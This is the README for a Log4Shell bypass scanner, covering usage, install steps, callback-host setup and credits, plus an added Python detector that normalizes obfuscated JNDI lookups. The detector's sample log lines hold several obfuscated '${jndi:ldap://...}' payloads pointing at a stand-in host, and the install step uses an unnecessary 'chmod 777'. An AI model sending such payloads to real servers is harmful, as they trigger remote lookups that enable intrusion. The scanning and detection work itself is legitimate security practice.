This script enables you to easily test for all of the Log4J bypass methods.
This script was created for ETHICAL usage only. Ethical uses include testing your own software, testing software in a penetration test, testing software in a bug bounty, testing purposefully vulnerable software either independently or in an educational setting, or testing software with consent by the creator. Be Hackers with Halos and only use this for ethical purposes. I am not liable for any damage you cause with this software and you are encouraged to look at the source code to understand how it works before using it. You are not permitted to use this software for illegal or cyberwarfare purposes.
```text
# If you are running this program through the BlackArch repo, you can run it from any directory using 'log4j-bypass' instead of 'bypass.py'
usage: bypass.py [-h] [-u URL] [-p PROXY] [-l USEDLIST] [-w WAIT_TIME]
                 [-c CUSTOM_DNS_CALLBACK_HOST] [-t THREADS]

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Check a single URL.
  -p PROXY, --proxy PROXY
                        send requests through proxy
  -l USEDLIST, --list USEDLIST
                        Check a list of URLs.
  -w WAIT_TIME, --wait-time WAIT_TIME
                        Wait time after all URLs are processed (in seconds) -
                        [Default: 60].
  -c CUSTOM_DNS_CALLBACK_HOST, --callback-url CUSTOM_DNS_CALLBACK_HOST
                        Custom DNS Callback Host.
  -t THREADS, --threads THREADS
                        Num threads for concurrent scanning - [Default: 2].
```
This program is preinstalled on BlackArch Linux via the blackarch repo, so if you are using Arch Linux, add the blackarch repo and then run `sudo pacman -Syu log4j-bypass`.
Otherwise, install it using the instructions below.
```bash
# You must have git and python3 installed to use this code
git clone https://github.com/cyberqueen-meg/log4j-bypass.git
cd log4j-bypass
# make the script executable (chmod +x bypass.py is sufficient; world-writable is not required)
chmod 777 bypass.py
python3 bypass.py -h
```
To use this, you may want to set up a CanaryToken to record the DNS hits and view them in a cleaner interface. To do so, go to https://canarytokens.org/generate#, select the Log4Shell token, and pass the generated token to the program after the `--callback-url` flag when executing the script. You can also use other services such as http://dnslog.cn, or your own hosted server set up through a utility such as marshalsec (https://github.com/mbechler/marshalsec), OpenLDAP, or similar resources. If you want to host your own server for this, check out the free TryHackMe room created by John Hammond that walks you through setting up the servers to exploit log4j at https://tryhackme.com/room/solar. One of these callback hosts is required; the script has nothing to report without it.
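The scanner sends lookup variants and relies on the callback host to show which ones reached a vulnerable Log4j; the defender's problem is the mirror image, since a plain `jndi:` regex misses the same variants (the "regex bypasses" credited below). The following is an added, defender-side example and is not part of log4j-bypass: it canonicalizes Log4j 2's documented lookup syntax (`${lower:…}`, `${upper:…}` and the `:-` default-value form) before matching, then runs that over constructed access-log lines. The hostname `callback.example`, the log lines, the `<…>` sentinel and the "assume the lookup fails, take the default" rule are my assumptions for detection purposes, not how Log4j itself evaluates lookups.

```python
import re

# Innermost Log4j 2 lookup: "${" ... "}" with no nested "${" or "}" inside.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Sentinel for a lookup we do not evaluate offline. "<" and ">" are not lookup
# delimiters, so an enclosing ${...} is still matched on the next round.
_OPEN, _CLOSE = "<", ">"


def _resolve_lookup(body: str) -> str:
    """Resolve one innermost ${body} the way a detector (not Log4j) would.

    Handled forms, all documented Log4j 2 lookup syntax:
      ${prefix:key:-default} -> "default" (conservative assumption that the
                                lookup fails, so ${::-j} and ${env:X:-j} yield "j")
      ${lower:text}          -> text lower-cased
      ${upper:text}          -> text upper-cased
    Any other prefix (env, sys, date, jndi, ...) is not evaluated; it is wrapped
    in sentinels so the analyst still sees the resolved prefix and argument.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    if ":" in body:
        prefix, arg = body.split(":", 1)
        prefix = prefix.lower()
        if prefix == "lower":
            return arg.lower()
        if prefix == "upper":
            return arg.upper()
    return _OPEN + body + _CLOSE


def canonicalize(text: str, max_rounds: int = 32) -> str:
    """Resolve innermost lookups round by round until nothing changes.

    max_rounds bounds the work on adversarial input with very deep nesting.
    """
    for _ in range(max_rounds):
        resolved = _INNER_LOOKUP.sub(lambda m: _resolve_lookup(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def is_jndi_lookup(text: str) -> bool:
    """True when, after canonicalization, the text contains a JNDI lookup.

    The sentinel is part of the match so the literal word "jndi:" in ordinary
    log text (e.g. documentation) is not flagged; the match is case-insensitive
    because ${upper:j}ndi resolves to "Jndi" and Log4j accepts that prefix.
    """
    return (_OPEN + "jndi:") in canonicalize(text).lower()


def find_jndi_lookups(lines):
    """Return (line_index, canonical_form) for every line carrying a JNDI lookup."""
    return [(i, canonicalize(line)) for i, line in enumerate(lines) if is_jndi_lookup(line)]


# Constructed access-log lines (not real traffic). The user-agent field carries a
# plain JNDI lookup, three obfuscated forms, and two benign values.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://callback.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:ldap://callback.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}di:ldap://callback.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:${lower:LDAP}://callback.example/a}"',
    '10.0.0.3 - - "GET / HTTP/1.1" 200 "${date:yyyy}"',
]

if __name__ == "__main__":
    for index, canonical in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {index}: {canonical}")
```

The design choice worth noting is that matching happens on the canonical form, not the raw line: every obfuscated variant collapses to the same `<jndi:ldap://callback.example/a>` string, so one rule covers them all, and a new variant only needs the canonicalizer taught a new lookup, not a new regex.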
Email me at cyberqueenmeg@wearehackerone with any questions you have and feel free to fork this repo for your own use or contribute! I'll do my best to keep it updated with new bypasses but I might miss one so please contribute if you find a new bypass :D
Special thanks to https://github.com/fullhunt/log4j-scan for inspiring the majority of this code! This is a fork of their project modified to include more details and make it easier to test all the bypasses and new versions.
Special thanks to https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words for providing lots of the bypasses I included in the bypass_payloads array
Special thanks to @noptrix for adding multithreading support and helping me get this software in the BlackArch repo!
Special thanks to @christian-taillon for providing his log4j threat hunting repo which I used to get the new regex bypasses!
This program won an award! Thanks to https://github.com/bugbountyhunters for awarding this program 2nd place in their bug bounty tool competition!
Thank you to all of the defenders, penetration testers, bug bounty hunters, and threat hunters who are actively trying to find and patch this vulnerability and who are sharing information and fixes that they have found.